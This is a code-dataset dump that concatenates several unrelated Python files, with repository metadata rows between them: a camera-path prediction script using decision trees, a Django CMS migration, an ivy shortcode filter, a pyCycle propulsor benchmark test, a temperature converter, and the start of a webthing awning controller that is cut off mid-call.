# 'gallery/14-23/14-23_person_0_ML.csv', 'gallery/14-23/14-23_person_1_ML.csv',
# 'gallery/14-23/14-23_person_2_ML.csv',
# 'gallery/14-32/14-32_person_0_ML.csv', 'gallery/14-32/14-32_person_1_ML.csv',
# 'gallery/14-32/14-32_person_2_ML.csv',
# 'gallery/14-36/14-36_person_0_ML.csv', 'gallery/14-36/14-36_person_1_ML.csv',
# 'gallery/14-36/14-36_person_2_ML.csv',
# 'gallery/14-38/14-38_person_0_ML.csv', 'gallery/14-38/14-38_person_1_ML.csv',
# 'gallery/14-38/14-38_person_2_ML.csv',
# 'gallery/14-45/14-45_person_0_ML.csv', 'gallery/14-45/14-45_person_1_ML.csv',
# 'gallery/14-45/14-45_person_2_ML.csv',
# 'gallery/14-52/14-52_person_0_ML.csv', 'gallery/14-52/14-52_person_1_ML.csv',
# 'gallery/14-52/14-52_person_2_ML.csv',
# 'gallery/14-55/14-55_person_0_ML.csv', 'gallery/14-55/14-55_person_1_ML.csv',
# 'gallery/14-55/14-55_person_2_ML.csv',
# 'gallery/14-58/14-58_person_0_ML.csv', 'gallery/14-58/14-58_person_1_ML.csv',
# 'gallery/14-58/14-58_person_2_ML.csv',
# 'gallery/15-00/15-00_person_0_ML.csv', 'gallery/15-00/15-00_person_1_ML.csv',
# 'gallery/15-00/15-00_person_2_ML.csv',
# 'gallery/15-14/15-14_person_0_ML.csv', 'gallery/15-14/15-14_person_1_ML.csv',
# 'gallery/15-14/15-14_person_2_ML.csv', 'gallery/15-14/15-14_person_3_ML.csv',
# 'gallery/15-18/15-18_person_0_ML.csv', 'gallery/15-18/15-18_person_1_ML.csv',
# 'gallery/15-18/15-18_person_2_ML.csv', 'gallery/15-18/15-18_person_3_ML.csv',
# 'gallery/15-21/15-21_person_0_ML.csv', 'gallery/15-21/15-21_person_1_ML.csv',
# 'gallery/15-21/15-21_person_2_ML.csv', 'gallery/15-21/15-21_person_3_ML.csv',
# 'gallery/15-28/15-28_person_0_ML.csv', 'gallery/15-28/15-28_person_1_ML.csv',
# 'gallery/15-28/15-28_person_2_ML.csv', 'gallery/15-28/15-28_person_3_ML.csv',
# 'gallery/15-28/15-28_person_4_ML.csv',
# 'gallery/15-36/15-36_person_0_ML.csv', 'gallery/15-36/15-36_person_1_ML.csv',
# 'gallery/15-36/15-36_person_2_ML.csv', 'gallery/15-36/15-36_person_3_ML.csv',
# 'gallery/15-36/15-36_person_4_ML.csv',
# ]
input_frame_number = 3 # 输入学习帧数
input_label_delay = [1, 3, 9, 15, 30, 45] # 预测样本和标签差
train_model(train_file, input_frame_number, input_label_delay)
cal_accuracy(test_file, input_frame_number, input_label_delay)
glo_end = time.time()
print('global', glo_end - glo_start)
| 43.549724 | 101 | 0.577101 | #!/usr/bin/env python3
# coding=utf-8
import numpy as np
from sklearn.svm import SVC
from sklearn.externals import joblib
from sklearn import linear_model
from sklearn.neural_network import MLPClassifier
from sklearn.preprocessing import StandardScaler
from sklearn.tree import DecisionTreeClassifier
import time
def _generate_path(path_list):
path_stack = []
for cam_id in path_list: # 画出每次的实际路线堆栈
if cam_id not in ['0', '1', '2', '3', '4', '5']: # 只判断实际6个cam内情况
continue
if not path_stack:
path_stack.append(cam_id)
else:
if cam_id != path_stack[-1]:
path_stack.append(cam_id)
return path_stack
def _judge_accuracy(predict_array, real_array):
correct = 0
for i in range(len(predict_array)):
if predict_array[i] == real_array[i]:
# print(predict_array[i], real_array[i])
correct += 1
# else:
# print('错误:', predict_array[i], '实际:', real_array[i])
correct_rate = correct / len(predict_array)
return correct_rate * 100
def _judge_accuracy_stack(predict_array_list, labels, label_dealy_list, input_frame):
    """Evaluate per-horizon camera-path prediction accuracy.

    For every frame after warm-up, the path predicted from the first ``j``
    horizons is compared against the real future path derived from
    ``labels``; a single camera mismatch marks the whole prediction wrong
    for that horizon count. Prints intermediate comparisons and the final
    per-horizon accuracy ratios.
    """
    correct_list = [0 for _ in range(len(label_dealy_list))]
    # Warm-up offset: predictions exist only once the longest delay plus the
    # input window has elapsed (e.g. 45 + 10 - 1 = 54).
    index_start = label_dealy_list[-1] + input_frame - 1
    for i in range(index_start, len(predict_array_list)):
        real_stack = _generate_path(labels[i:])
        # Build the predicted path from the first 1..N horizon outputs.
        for j in range(1, len(label_dealy_list) + 1):
            predict_stack = _generate_path(predict_array_list[i][:j])
            print(i, j, 'real:', real_stack, 'prediction:', predict_stack, predict_array_list[i][:j])
            correct_list[j-1] += 1  # assume correct; revoke on first mismatch
            for n in range(len(predict_stack)):
                try:
                    if predict_stack[n] != real_stack[n]:
                        print('错误')
                        correct_list[j - 1] -= 1
                        break
                except IndexError:
                    # real_stack is shorter than the prediction. Fix: catch
                    # only IndexError instead of a bare except that could
                    # silently swallow unrelated bugs.
                    break
    print(correct_list, len(predict_array_list) - index_start)
    for i in range(len(correct_list)):
        correct_list[i] /= len(predict_array_list) - index_start
    print(correct_list)
def _train_model_save(x_inner, y_inner, name):
    """Fit a depth-limited decision tree on (x_inner, y_inner) and persist it.

    The trained model is written to ``ML_model/model_tree_<name>.m`` via
    joblib. Training time is printed for benchmarking. (Earlier experiments
    with SVM, MLP and logistic-regression variants were disabled.)
    """
    print('---------', name, '---------')
    print("进行决策树训练")
    started_at = time.time()
    tree_model = DecisionTreeClassifier(max_depth=5).fit(x_inner, y_inner)
    joblib.dump(tree_model, "ML_model/model_tree_" + name + ".m")
    finished_at = time.time()
    print("执行时间:", finished_at - started_at)
def train_model(train_file_inner, input_frame_number_inner, input_label_delay_inner):
    """Train one decision tree per label delay from the given CSV files.

    For each delay in ``input_label_delay_inner``, rows are read from every
    training CSV (first column = camera label, rest = features), labels are
    shifted forward by the delay, consecutive frames are stacked into one
    feature vector, and the result is handed to ``_train_model_save``.
    """
    for number in input_label_delay_inner:
        print('---------', number, '---------')
        data = []
        labels = []
        max_train_num = 20000
        mode = 6
        for train_file_each in train_file_inner:
            delay = number # delay must be reset here now that the delays are passed as a list
            with open(train_file_each) as file:
                for line in file:
                    tokens = line.strip().split(',')
                    # mode 4: keep only cameras 1-4 (plus transition ids); skip other rows
                    if mode == 4: # no longer used: cam4 data was split into its own file
                        if tokens[0] not in ['1', '2', '3', '4', '7', '9', '10', '11', '12', '13']:
                            # print('delete:', tokens)
                            continue
                    data.append([tk for tk in tokens[1:]])
                    if delay != 0: # shift the label later by `number` frames
                        delay -= 1
                        continue
                    labels.append(tokens[0])
        if number:
            data = data[:-number] # drop trailing rows that have no shifted label
        # print(len(data), len(labels), data[0], data[-1])
        if input_frame_number_inner != 1:
            delay_vector = input_frame_number_inner
            temp_vector = []
            temp_data = []
            # labels were already shifted above, so each stacked input maps to
            # the label that follows its last row
            for line_idx in range(len(data)-input_frame_number_inner+1):
                temp_idx = line_idx
                while delay_vector:
                    temp_vector += data[temp_idx]
                    # print('临时为:', temp_vector)
                    temp_idx += 1
                    delay_vector -= 1
                delay_vector = input_frame_number_inner
                temp_data.append(temp_vector)
                temp_vector = []
            data = temp_data
            labels = labels[input_frame_number_inner-1:]
        if len(data) > max_train_num: # cap the number of training rows
            data = data[-max_train_num:]
            labels = labels[-max_train_num:]
        print("输入维度为:", len(data[0]))
        x = np.array(data)
        y = np.array(labels)
        print("总data样本数为:", len(x))
        print("总label样本数为:", len(y))
        # dump all training rows (debug)
        # for i, line in enumerate(data):
        #     print(len(line), line, labels[i])
        _train_model_save(x, y, str(number))
def cal_accuracy(test_file_inner, input_frame_number_inner, input_label_delay_inner):
    """Load the per-delay decision trees and evaluate them on a test CSV.

    Predictions for every delay are collected per frame into
    ``test_X_result`` (one list of horizon predictions per frame) and then
    scored with ``_judge_accuracy_stack``.
    """
    test_X_result = []
    test_Y = []
    with open(test_file_inner) as file:
        for line in file:
            tokens = line.strip().split(',')
            test_Y.append(tokens[0])
    for __ in range(180): # temporary: hard-coded 180 frames — TODO derive from file length
        test_X_result.append([])
    for number in input_label_delay_inner:
        print('---------', number, '---------')
        data = []
        labels = []
        delay = number
        with open(test_file_inner) as file:
            for line in file:
                tokens = line.strip().split(',')
                data.append([tk for tk in tokens[1:]])
                if delay != 0: # shift the label later by `number` frames
                    delay -= 1
                    continue
                labels.append(tokens[0])
        if number != 0:
            data = data[:-number] # drop trailing rows that have no shifted label
        if input_frame_number_inner != 1:
            delay_vector = input_frame_number_inner
            temp_vector = []
            temp_data = []
            # labels were already shifted above, so each stacked input maps to
            # the label that follows its last row
            for line_idx in range(len(data)-input_frame_number_inner+1):
                temp_idx = line_idx
                while delay_vector:
                    temp_vector += data[temp_idx]
                    # print('临时为:', temp_vector)
                    temp_idx += 1
                    delay_vector -= 1
                delay_vector = input_frame_number_inner
                temp_data.append(temp_vector)
                temp_vector = []
            data = temp_data
            labels = labels[input_frame_number_inner-1:]
        test_X = np.array(data)
        # test_Y = np.array(labels)
        # print("读取输入样本数为:", len(test_X))
        # print("读取输出样本数为:", len(test_Y))
        '''
        start = time.time()
        clf_linear_global = joblib.load("model_2cam/model_linear_global.m")
        test_X_result = clf_linear_global.predict(test_X)
        # print("linear全局预测准确率:", _judge_accuracy(test_X_result, test_Y_global))
        print("linear全局预测准确率:", _judge_accuracy_ave(test_X_result, test_Y_global))
        end = time.time()
        print("执行时间:", end - start)
        '''
        # start = time.time()
        # clf_rbf_global = joblib.load("ML_model/model_rbf_global.m")
        # test_X_result = clf_rbf_global.predict(test_X)
        # # print(test_X_result)
        # # print(test_Y)
        # print("rbf全局预测准确率:", _judge_accuracy(test_X_result, test_Y))
        # end = time.time()
        # print("执行时间:", end - start)
        # start = time.time()
        # clf_sigmoid_global = joblib.load("ML_model/model_sigmoid_global.m")
        # test_X_result = clf_sigmoid_global.predict(test_X)
        # print("sigmoid全局预测准确率:", _judge_accuracy(test_X_result, test_Y))
        # end = time.time()
        # print("执行时间:", end - start)
        load_name = "ML_model/model_tree_" + str(number) + '.m'
        start = time.time()
        clf_tree_global = joblib.load(load_name)
        test_X_result_temp = clf_tree_global.predict(test_X)
        print(test_X_result_temp)
        end = time.time()
        print("执行时间:", end - start)
        # store each prediction at the frame it refers to (input window + delay offset)
        for i, result in enumerate(test_X_result_temp):
            test_X_result[input_frame_number_inner + number - 1 + i].append(result)
        # # preprocessing used by the logistic-regression and MLP variants
        # sc = StandardScaler().fit(test_X)
        # test_X = sc.transform(test_X)
        #
        # start = time.time()
        # clf_logreg_global = joblib.load("ML_model/model_logreg_global.m")
        # test_X_result = clf_logreg_global.predict(test_X)
        # print("logreg全局预测准确率:", _judge_accuracy(test_X_result, test_Y))
        # end = time.time()
        # print("执行时间:", end - start)
        #
        # start = time.time()
        # clf_mlp_global = joblib.load("ML_model/model_mlp_global.m")
        # test_X_result = clf_mlp_global.predict(test_X)
        # print("mlp全局预测准确率:", _judge_accuracy(test_X_result, test_Y))
        # end = time.time()
        # print("执行时间:", end - start)
    for i, res in enumerate(test_X_result):
        print(i, res)
    _judge_accuracy_stack(test_X_result, test_Y, input_label_delay_inner, input_frame_number_inner)
if __name__ == '__main__':
    # Script entry: pick a test trajectory and a training set, train the
    # per-delay models, then evaluate. Alternative training sets of various
    # total durations are kept below, commented out.
    glo_start = time.time()
    test_file = "gallery/15-21/15-21_person_1_ML.csv"
    # 180s
    # train_file = ['gallery/14-23/14-23_person_0_ML.csv', 'gallery/14-23/14-23_person_1_ML.csv',
    #               'gallery/14-23/14-23_person_2_ML.csv']
    # 360s
    train_file = ['gallery/14-12/14-12_person_0_ML.csv', 'gallery/14-12/14-12_person_1_ML.csv',
                  'gallery/14-12/14-12_person_2_ML.csv', 'gallery/14-14/14-14_person_0_ML.csv',
                  'gallery/14-14/14-14_person_1_ML.csv', 'gallery/14-14/14-14_person_2_ML.csv']
    # 720s
    # train_file = ['gallery/14-12/14-12_person_0_ML.csv', 'gallery/14-12/14-12_person_1_ML.csv',
    #               'gallery/14-12/14-12_person_2_ML.csv', 'gallery/14-14/14-14_person_0_ML.csv',
    #               'gallery/14-14/14-14_person_1_ML.csv', 'gallery/14-14/14-14_person_2_ML.csv',
    #               'gallery/14-23/14-23_person_0_ML.csv', 'gallery/14-23/14-23_person_1_ML.csv',
    #               'gallery/14-23/14-23_person_2_ML.csv', 'gallery/14-32/14-32_person_0_ML.csv',
    #               'gallery/14-32/14-32_person_1_ML.csv', 'gallery/14-32/14-32_person_2_ML.csv',]
    # 720s
    # train_file = ['gallery/14-32/14-32_person_0_ML.csv', 'gallery/14-32/14-32_person_1_ML.csv',
    #               'gallery/14-32/14-32_person_2_ML.csv',
    #               'gallery/14-36/14-36_person_0_ML.csv', 'gallery/14-36/14-36_person_1_ML.csv',
    #               'gallery/14-36/14-36_person_2_ML.csv',
    #               'gallery/14-38/14-38_person_0_ML.csv', 'gallery/14-38/14-38_person_1_ML.csv',
    #               'gallery/14-38/14-38_person_2_ML.csv',
    #               'gallery/14-45/14-45_person_0_ML.csv', 'gallery/14-45/14-45_person_1_ML.csv',
    #               'gallery/14-45/14-45_person_2_ML.csv']
    # 3480s
    # train_file = ['gallery/14-08/14-08_person_0_ML.csv', 'gallery/14-08/14-08_person_1_ML.csv',
    #               'gallery/14-08/14-08_person_2_ML.csv',
    #               'gallery/14-12/14-12_person_0_ML.csv', 'gallery/14-12/14-12_person_1_ML.csv',
    #               'gallery/14-12/14-12_person_2_ML.csv',
    #               'gallery/14-14/14-14_person_0_ML.csv', 'gallery/14-14/14-14_person_1_ML.csv',
    #               'gallery/14-14/14-14_person_2_ML.csv',
    #               'gallery/14-23/14-23_person_0_ML.csv', 'gallery/14-23/14-23_person_1_ML.csv',
    #               'gallery/14-23/14-23_person_2_ML.csv',
    #               'gallery/14-32/14-32_person_0_ML.csv', 'gallery/14-32/14-32_person_1_ML.csv',
    #               'gallery/14-32/14-32_person_2_ML.csv',
    #               'gallery/14-36/14-36_person_0_ML.csv', 'gallery/14-36/14-36_person_1_ML.csv',
    #               'gallery/14-36/14-36_person_2_ML.csv',
    #               'gallery/14-38/14-38_person_0_ML.csv', 'gallery/14-38/14-38_person_1_ML.csv',
    #               'gallery/14-38/14-38_person_2_ML.csv',
    #               'gallery/14-45/14-45_person_0_ML.csv', 'gallery/14-45/14-45_person_1_ML.csv',
    #               'gallery/14-45/14-45_person_2_ML.csv',
    #               'gallery/14-52/14-52_person_0_ML.csv', 'gallery/14-52/14-52_person_1_ML.csv',
    #               'gallery/14-52/14-52_person_2_ML.csv',
    #               'gallery/14-55/14-55_person_0_ML.csv', 'gallery/14-55/14-55_person_1_ML.csv',
    #               'gallery/14-55/14-55_person_2_ML.csv',
    #               'gallery/14-58/14-58_person_0_ML.csv', 'gallery/14-58/14-58_person_1_ML.csv',
    #               'gallery/14-58/14-58_person_2_ML.csv',
    #               'gallery/15-00/15-00_person_0_ML.csv', 'gallery/15-00/15-00_person_1_ML.csv',
    #               'gallery/15-00/15-00_person_2_ML.csv',
    #               'gallery/15-14/15-14_person_0_ML.csv', 'gallery/15-14/15-14_person_1_ML.csv',
    #               'gallery/15-14/15-14_person_2_ML.csv', 'gallery/15-14/15-14_person_3_ML.csv',
    #               'gallery/15-18/15-18_person_0_ML.csv', 'gallery/15-18/15-18_person_1_ML.csv',
    #               'gallery/15-18/15-18_person_2_ML.csv', 'gallery/15-18/15-18_person_3_ML.csv',
    #               'gallery/15-21/15-21_person_0_ML.csv', 'gallery/15-21/15-21_person_1_ML.csv',
    #               'gallery/15-21/15-21_person_2_ML.csv', 'gallery/15-21/15-21_person_3_ML.csv',
    #               'gallery/15-28/15-28_person_0_ML.csv', 'gallery/15-28/15-28_person_1_ML.csv',
    #               'gallery/15-28/15-28_person_2_ML.csv', 'gallery/15-28/15-28_person_3_ML.csv',
    #               'gallery/15-28/15-28_person_4_ML.csv',
    #               'gallery/15-36/15-36_person_0_ML.csv', 'gallery/15-36/15-36_person_1_ML.csv',
    #               'gallery/15-36/15-36_person_2_ML.csv', 'gallery/15-36/15-36_person_3_ML.csv',
    #               'gallery/15-36/15-36_person_4_ML.csv',
    #               ]
    input_frame_number = 3  # number of consecutive frames stacked into one input
    input_label_delay = [1, 3, 9, 15, 30, 45]  # frame offsets between sample and label
    train_model(train_file, input_frame_number, input_label_delay)
    cal_accuracy(test_file, input_frame_number, input_label_delay)
    glo_end = time.time()
    print('global', glo_end - glo_start)
| 10,993 | 0 | 138 |
a8da6c27168c030127b89099f0e61debcd9543af | 3,829 | py | Python | src/automations/cms_automations/migrations/0001_initial.py | sebastianmanger/django-automations | 070e700d29ef68f1b27c7f016ee6a08c41be56fe | [
"MIT"
] | 20 | 2021-04-25T16:19:09.000Z | 2022-02-17T13:55:57.000Z | src/automations/cms_automations/migrations/0001_initial.py | sebastianmanger/django-automations | 070e700d29ef68f1b27c7f016ee6a08c41be56fe | [
"MIT"
] | 25 | 2021-11-21T14:39:59.000Z | 2022-02-01T11:32:17.000Z | src/automations/cms_automations/migrations/0001_initial.py | sebastianmanger/django-automations | 070e700d29ef68f1b27c7f016ee6a08c41be56fe | [
"MIT"
] | 4 | 2021-11-21T04:27:55.000Z | 2022-03-04T01:37:06.000Z | # Generated by Django 3.1.8 on 2021-05-02 11:09
import django.db.models.deletion
from django.db import migrations, models
| 33.587719 | 108 | 0.402455 | # Generated by Django 3.1.8 on 2021-05-02 11:09
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated initial migration for the cms_automations app.

    Creates three CMS plugin models (each a OneToOne child of
    ``cms.CMSPlugin``): AutomationHookPlugin, AutomationStatusPlugin and
    AutomationTasksPlugin.
    """

    initial = True
    dependencies = [
        ("cms", "0022_auto_20180620_1551"),
    ]
    operations = [
        migrations.CreateModel(
            name="AutomationHookPlugin",
            fields=[
                (
                    "cmsplugin_ptr",
                    models.OneToOneField(
                        auto_created=True,
                        on_delete=django.db.models.deletion.CASCADE,
                        parent_link=True,
                        primary_key=True,
                        related_name="cms_automations_automationhookplugin",
                        serialize=False,
                        to="cms.cmsplugin",
                    ),
                ),
                (
                    "automation",
                    models.CharField(max_length=128, verbose_name="Automation"),
                ),
                (
                    "token",
                    models.CharField(
                        blank=True, max_length=128, verbose_name="Optional token"
                    ),
                ),
            ],
            options={
                "abstract": False,
            },
            bases=("cms.cmsplugin",),
        ),
        migrations.CreateModel(
            name="AutomationStatusPlugin",
            fields=[
                (
                    "cmsplugin_ptr",
                    models.OneToOneField(
                        auto_created=True,
                        on_delete=django.db.models.deletion.CASCADE,
                        parent_link=True,
                        primary_key=True,
                        related_name="cms_automations_automationstatusplugin",
                        serialize=False,
                        to="cms.cmsplugin",
                    ),
                ),
                (
                    "template",
                    models.CharField(max_length=128, verbose_name="Task data"),
                ),
                ("name", models.CharField(blank=True, max_length=128)),
            ],
            options={
                "abstract": False,
            },
            bases=("cms.cmsplugin",),
        ),
        migrations.CreateModel(
            name="AutomationTasksPlugin",
            fields=[
                (
                    "cmsplugin_ptr",
                    models.OneToOneField(
                        auto_created=True,
                        on_delete=django.db.models.deletion.CASCADE,
                        parent_link=True,
                        primary_key=True,
                        related_name="cms_automations_automationtasksplugin",
                        serialize=False,
                        to="cms.cmsplugin",
                    ),
                ),
                (
                    "template",
                    models.CharField(
                        choices=[
                            ("automations/includes/task_list.html", "Default template")
                        ],
                        default="automations/includes/task_list.html",
                        max_length=128,
                        verbose_name="Template",
                    ),
                ),
                (
                    "always_inform",
                    models.BooleanField(
                        default=True,
                        # NOTE(review): help_text reads "will out output" — likely
                        # meant "will not output"; fixing it needs a new migration.
                        help_text="If deactivated plugin will out output anything if no task is available.",
                        verbose_name="Always inform",
                    ),
                ),
            ],
            options={
                "abstract": False,
            },
            bases=("cms.cmsplugin",),
        ),
    ]
| 0 | 3,682 | 23 |
3771c6c2f4d9250af64216e9c17b431cf831fb7a | 988 | py | Python | ivy/ext/ivy_shortcodes.py | swsch/ivy | 4932cf7541acff13815be613b0f3335b21c86670 | [
"Unlicense"
] | null | null | null | ivy/ext/ivy_shortcodes.py | swsch/ivy | 4932cf7541acff13815be613b0f3335b21c86670 | [
"Unlicense"
] | null | null | null | ivy/ext/ivy_shortcodes.py | swsch/ivy | 4932cf7541acff13815be613b0f3335b21c86670 | [
"Unlicense"
] | null | null | null | import ivy
import sys
try:
import shortcodes
except ImportError:
shortcodes = None
# Use a single parser instance to parse all files.
parser = None
# The bare 'shortcodes' attribute for custom settings is deprecated.
if shortcodes:
@ivy.filters.register('node_text')
| 28.228571 | 73 | 0.601215 | import ivy
import sys
try:
import shortcodes
except ImportError:
shortcodes = None
# Use a single parser instance to parse all files.
parser = None
# The bare 'shortcodes' attribute for custom settings is deprecated.
if shortcodes:
@ivy.filters.register('node_text')
def render(text, node):
global parser
if parser is None:
new_settings = ivy.site.config.get('shortcode_settings')
old_settings = ivy.site.config.get('shortcodes')
settings = new_settings or old_settings or {}
parser = shortcodes.Parser(**settings)
try:
return parser.parse(text, node)
except shortcodes.ShortcodeError as err:
msg = "Shortcode Error\n"
msg += f">> Node: {node.url}\n"
msg += f">> {err.__class__.__name__}: {err}"
if (cause := err.__cause__):
msg += f"\n>> Cause: {cause.__class__.__name__}: {cause}"
sys.exit(msg)
| 677 | 0 | 26 |
72d447079357ad9532eb8adbf4c6e89fc73bc0c4 | 2,270 | py | Python | example_cycles/tests/benchmark_electric_propulsor.py | askprash/pyCycle | e0845d7e320b6cb47367734c26ec3410c9fa5bf7 | [
"Apache-2.0"
] | null | null | null | example_cycles/tests/benchmark_electric_propulsor.py | askprash/pyCycle | e0845d7e320b6cb47367734c26ec3410c9fa5bf7 | [
"Apache-2.0"
] | null | null | null | example_cycles/tests/benchmark_electric_propulsor.py | askprash/pyCycle | e0845d7e320b6cb47367734c26ec3410c9fa5bf7 | [
"Apache-2.0"
] | null | null | null | import numpy as np
import unittest
import os
import openmdao.api as om
from openmdao.utils.assert_utils import assert_near_equal
import pycycle.api as pyc
from example_cycles.electric_propulsor import MPpropulsor
if __name__ == "__main__":
unittest.main() | 31.527778 | 79 | 0.644053 | import numpy as np
import unittest
import os
import openmdao.api as om
from openmdao.utils.assert_utils import assert_near_equal
import pycycle.api as pyc
from example_cycles.electric_propulsor import MPpropulsor
class ElectricPropulsorTestCase(unittest.TestCase):
    """Regression benchmark for the electric propulsor example cycle."""

    def benchmark_case1(self):
        """Run the design point plus one off-design point and check outputs.

        The expected values below are regression references captured from a
        converged run, not analytically derived.
        """
        prob = om.Problem()
        prob.model = mp_propulsor = MPpropulsor()
        prob.set_solver_print(level=-1)
        prob.set_solver_print(level=2, depth=2)
        prob.setup()
        #Define the design point
        prob.set_val('design.fc.alt', 10000, units='m')
        prob.set_val('design.fc.MN', 0.8)
        prob.set_val('design.inlet.MN', 0.6)
        prob.set_val('design.fan.PR', 1.2)
        prob.set_val('pwr_target', -3486.657, units='hp')
        prob.set_val('design.fan.eff', 0.96)
        prob.set_val('off_design.fc.alt', 12000, units='m')
        # Set initial guesses for balances
        prob['design.balance.W'] = 200.
        for i, pt in enumerate(mp_propulsor.od_pts):
            # initial guesses
            prob['off_design.fan.PR'] = 1.2
            prob['off_design.balance.W'] = 406.790
            prob['off_design.balance.Nmech'] = 1. # normalized value
        # Tighten solver tolerances before running the coupled model.
        prob.model.design.nonlinear_solver.options['atol'] = 1e-6
        prob.model.design.nonlinear_solver.options['rtol'] = 1e-6
        prob.model.off_design.nonlinear_solver.options['atol'] = 1e-6
        prob.model.off_design.nonlinear_solver.options['rtol'] = 1e-6
        prob.model.off_design.nonlinear_solver.options['maxiter'] = 10
        self.prob = prob
        prob.run_model()
        tol = 1e-5
        # Design-point regression values.
        assert_near_equal(prob['design.fc.Fl_O:stat:W'], 406.790, tol)
        assert_near_equal(prob['design.nozz.Fg'], 12070.380, tol)
        assert_near_equal(prob['design.fan.SMN'], 36.64057531, tol)
        assert_near_equal(prob['design.fan.SMW'], 29.886, tol)
        # Off-design-point regression values.
        assert_near_equal(prob['off_design.fc.Fl_O:stat:W'], 315.3438487 , tol)
        assert_near_equal(prob['off_design.nozz.Fg'], 9653.17011134, tol)
        assert_near_equal(prob['off_design.fan.SMN'], 22.13770028, tol)
        assert_near_equal(prob['off_design.fan.SMW'], 18.95649308, tol)
if __name__ == "__main__":
unittest.main() | 1,924 | 30 | 51 |
836c857326383b2e3a35255f393ce2a2ae805a24 | 758 | py | Python | beta.py | SecDet65/bug-py | d311d6621e8d7edd0bf43ba632690c0842188f06 | [
"Apache-2.0"
] | null | null | null | beta.py | SecDet65/bug-py | d311d6621e8d7edd0bf43ba632690c0842188f06 | [
"Apache-2.0"
] | null | null | null | beta.py | SecDet65/bug-py | d311d6621e8d7edd0bf43ba632690c0842188f06 | [
"Apache-2.0"
] | null | null | null | import os
# Temperature converter: reads a scale letter and a value, then prints the
# value converted to the other two scales.
print(':::IMPORTANTE::: USE AS LETRAS CORRESPONDENTES => C (CESIUS), K (KELVIN) OU F (FIRENHEIT)\n\n')
# Fix: the banner asks for upper-case C/K/F but the comparisons only matched
# lower-case input — normalize with strip().lower() so both work.
temp = input('Qual temperatura quer saber? ').strip().lower()
tv = float(input('Digite o valor da temperatura: '))
if temp == 'c':
    fah = (tv * 1.8) + 32
    kel = tv + 273.15
    print('Fahrenheit {}\nKelvin {}\nCelsius {:.0f}' . format(fah, kel, tv))
if temp == 'k':
    # Fix: Kelvin -> Fahrenheit offset is 459.67 (was 459.7).
    fahk = (tv * 1.8) - 459.67
    kelk = tv - 273.15  # Celsius value, despite the variable name
    print('Fahrenheit {}\nCelsius {}\nKelvin {:.0f}' . format(fahk, kelk, tv))
if temp == 'f':
    fpk = (tv + 459.67) * 5/9
    fpc = (tv - 32) / 1.8
    print('Kelvin {}\nCelsius {}\nFahrenheit {:.0f}' . format(fpk, fpc, tv))
os.system('Pause')
| 30.32 | 105 | 0.53562 | import os
print(':::IMPORTANTE::: USE AS LETRAS CORRESPONDENTES => C (CESIUS), K (KELVIN) OU F (FIRENHEIT)\n\n')
temp = input('Qual temperatura quer saber? ')
tv = float(input('Digite o valor da temperatura: '))
if(temp == 'c'):
fah = ((tv * 1.8) + 32)
kel = (tv + 273.15)
cel = tv
print('Fahrenheit {}\nKelvin {}\nCelsius {:.0f}' . format(fah,kel,cel))
if(temp == 'k'):
fahk = ((tv * 1.8) - 459.7)
kelk = (tv - 273.15)
celk = tv
print('Fahrenheit {}\nCelsius {}\nKelvin {:.0f}' . format(fahk,kelk,celk))
if(temp == 'f'):
fpk = ((tv + 459.67) * 5/9)
fpc = ((tv - 32) / 1.8)
celf = tv
print('Kelvin {}\nCelsius {}\nFahrenheit {:.0f}' . format(fpk,fpc,celf))
os.system('Pause')
| 0 | 0 | 0 |
0ff93bc15d5ca9cabbe6220722dd3204ded3de54 | 5,079 | py | Python | pi_awning_webthing/awning_webthing.py | grro/pi_awning_webthing | c3186b9947a74d9cc2a9ba4a079b9201e769ba25 | [
"Apache-2.0"
] | null | null | null | pi_awning_webthing/awning_webthing.py | grro/pi_awning_webthing | c3186b9947a74d9cc2a9ba4a079b9201e769ba25 | [
"Apache-2.0"
] | null | null | null | pi_awning_webthing/awning_webthing.py | grro/pi_awning_webthing | c3186b9947a74d9cc2a9ba4a079b9201e769ba25 | [
"Apache-2.0"
] | null | null | null | from webthing import (MultipleThings, Property, Thing, Value, WebThingServer)
from pi_awning_webthing.awning import Awning, AwningPropertyListener
from pi_awning_webthing.switch import Switch
from pi_awning_webthing.motor_tb6612Fng import load_tb6612fng
from time import sleep
import logging
import tornado.ioloop
# regarding capabilities refer https://iot.mozilla.org/schemas
# there is also another schema registry http://iotschema.org/docs/full.html not used by webthing
| 37.902985 | 129 | 0.573538 | from webthing import (MultipleThings, Property, Thing, Value, WebThingServer)
from pi_awning_webthing.awning import Awning, AwningPropertyListener
from pi_awning_webthing.switch import Switch
from pi_awning_webthing.motor_tb6612Fng import load_tb6612fng
from time import sleep
import logging
import tornado.ioloop
class WebThingAwningPropertyListener(AwningPropertyListener):
    """Bridges awning state callbacks onto the webthing's tornado IOLoop.

    Each callback is forwarded via ``ioloop.add_callback`` so the property
    update runs on the webthing's event loop rather than the caller's thread.
    """

    def __init__(self, anwing_webthing):
        # The AnwingWebThing whose properties are updated on state changes.
        self.anwing_webthing = anwing_webthing

    def on_current_pos_updated(self, current_position: int):
        """Schedule an update of the webthing's current-position property."""
        self.anwing_webthing.ioloop.add_callback(self.anwing_webthing.set_current_position, current_position)

    def on_retracting_updated(self, retracting: bool):
        """Schedule an update of the webthing's retracting flag."""
        self.anwing_webthing.ioloop.add_callback(self.anwing_webthing.set_retracting, retracting)

    def on_extenting_updated(self, extenting: bool):
        """Schedule an update of the webthing's extending flag."""
        self.anwing_webthing.ioloop.add_callback(self.anwing_webthing.set_extending, extenting)
class AnwingWebThing(Thing):
    """WebThing exposing one awning: target/current position plus motion flags."""
    # regarding capabilities refer https://iot.mozilla.org/schemas
    # there is also another schema registry http://iotschema.org/docs/full.html not used by webthing
    def __init__(self, description: str, awning: Awning):
        """Wire the awning's state into webthing properties.

        :param description: human-readable thing description
        :param awning: the awning whose state is exposed and controlled
        """
        Thing.__init__(
            self,
            'urn:dev:ops:anwing-TB6612FNG',
            'Awning ' + awning.name + " Controller",
            ['MultiLevelSensor'],
            description
        )
        self.awning = awning
        # Listener marshals awning callbacks onto this thing's IOLoop.
        self.awning.register_listener(WebThingAwningPropertyListener(self))
        # Writable target position (0-100%); writes go to __target_position.
        self.target_position = Value(0, self.__target_position)
        self.add_property(
            Property(self,
                     'target_position',
                     self.target_position,
                     metadata={
                         '@type': 'LevelProperty',
                         'title': 'Awning target position',
                         "type": "integer",
                         "minimum": 0,
                         "maximum": 100,
                         "unit": "percent",
                         'description': 'awning target position'
                     }))
        # Read-only mirror of the awning's actual position.
        self.current_position = Value(0)
        self.add_property(
            Property(self,
                     'current_position',
                     self.current_position,
